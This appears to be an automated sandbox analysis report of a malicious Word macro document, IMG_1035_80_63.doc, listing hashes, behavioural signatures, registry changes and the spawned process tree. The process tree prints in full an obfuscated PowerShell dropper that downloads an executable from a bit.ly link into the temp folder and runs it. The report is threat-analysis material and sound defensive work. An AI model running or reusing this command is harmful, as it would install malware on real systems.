Analysis
-
max time kernel
69s -
max time network
19s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
11-03-2021 04:44
Static task
static1
Behavioral task
behavioral1
Sample
IMG_1035_80_63.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
IMG_1035_80_63.doc
Resource
win10v20201028
General
-
Target
IMG_1035_80_63.doc
-
Size
33KB
-
MD5
f1c7f28c1e71d97feabc188c267fd4a8
-
SHA1
bc323d3cb3234f98cfca8540ae9e7eb1ac29ab06
-
SHA256
b25e473d3fd1772bb3fcc4faec21fbdb5c1a5a2b2e3dcad5702d7466c8d7b9ce
-
SHA512
5ecc4583ad9904c808b52efdf9821c8e2b38df9e84af199b7265c3c95e5417b42030ebccbcd92de8774c46d466d97902a336c0da5de4aad5870034670fb49c52
Malware Config
Extracted
https://bit.ly/3ccVgSJ
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1740 780 powershell.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1740 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 780 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1740 powershell.exe 1740 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
WINWORD.EXEpid process 780 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1740 powershell.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
WINWORD.EXEpid process 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE 780 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 780 wrote to memory of 1740 780 WINWORD.EXE powershell.exe PID 780 wrote to memory of 1740 780 WINWORD.EXE powershell.exe PID 780 wrote to memory of 1740 780 WINWORD.EXE powershell.exe PID 780 wrote to memory of 1740 780 WINWORD.EXE powershell.exe PID 780 wrote to memory of 1144 780 WINWORD.EXE splwow64.exe PID 780 wrote to memory of 1144 780 WINWORD.EXE splwow64.exe PID 780 wrote to memory of 1144 780 WINWORD.EXE splwow64.exe PID 780 wrote to memory of 1144 780 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_1035_80_63.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" INvOkE-EXpRessiOn((('t9Qclien'+'t '+'= new'+'-'+'object S'+'ys'+'tem.Net.'+'WebClient'+';t9Qa'+' = AEi'+'https://bit.ly/3ccVgSJ'+'AEi.Spl'+'i'+'t'+'('+'AEi'+','+'AEi);t9Qhu'+'as = '+'t'+'9Q'+'env:temp'+' + AEi'+'c4g'+'pauele.exe'+'AEi;for'+'each'+'(t9'+'Q'+'b'+' in t9Qa)'+'{try{t9Qclie'+'nt'+'.DownloadFil'+'e(t9Qb.ToS'+'t'+'ring()'+','+' '+'t9Qhuas);I'+'nvoke-Item(t9Qhua'+'s);'+'b'+'reak;}catch{'+'write-hos'+'t t'+'9Q'+'_.Exce'+'ption.Me'+'ssa'+'ge'+'}};') -rePlacE't9Q',[ChAr]36 -crEPLacE'c4g',[ChAr]92 -crEPLacE'AEi',[ChAr]39) )2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/780-3-0x00000000700F1000-0x00000000700F3000-memory.dmpFilesize
8KB
-
memory/780-4-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/780-2-0x0000000072671000-0x0000000072674000-memory.dmpFilesize
12KB
-
memory/780-7-0x0000000001E70000-0x0000000001E71000-memory.dmpFilesize
4KB
-
memory/1144-9-0x0000000000000000-mapping.dmp
-
memory/1144-10-0x000007FEFBB61000-0x000007FEFBB63000-memory.dmpFilesize
8KB
-
memory/1740-12-0x0000000004A00000-0x0000000004A01000-memory.dmpFilesize
4KB
-
memory/1740-15-0x00000000049C2000-0x00000000049C3000-memory.dmpFilesize
4KB
-
memory/1740-6-0x0000000076071000-0x0000000076073000-memory.dmpFilesize
8KB
-
memory/1740-11-0x0000000002250000-0x0000000002251000-memory.dmpFilesize
4KB
-
memory/1740-5-0x0000000000000000-mapping.dmp
-
memory/1740-13-0x00000000025C0000-0x00000000025C1000-memory.dmpFilesize
4KB
-
memory/1740-14-0x00000000049C0000-0x00000000049C1000-memory.dmpFilesize
4KB
-
memory/1740-8-0x000000006A800000-0x000000006AEEE000-memory.dmpFilesize
6.9MB
-
memory/1740-16-0x0000000004950000-0x0000000004951000-memory.dmpFilesize
4KB
-
memory/1740-19-0x0000000006050000-0x0000000006051000-memory.dmpFilesize
4KB
-
memory/1740-24-0x0000000006090000-0x0000000006091000-memory.dmpFilesize
4KB
-
memory/1740-25-0x0000000006230000-0x0000000006231000-memory.dmpFilesize
4KB
-
memory/1740-26-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1740-33-0x00000000061A0000-0x00000000061A1000-memory.dmpFilesize
4KB
-
memory/1740-34-0x00000000062C0000-0x00000000062C1000-memory.dmpFilesize
4KB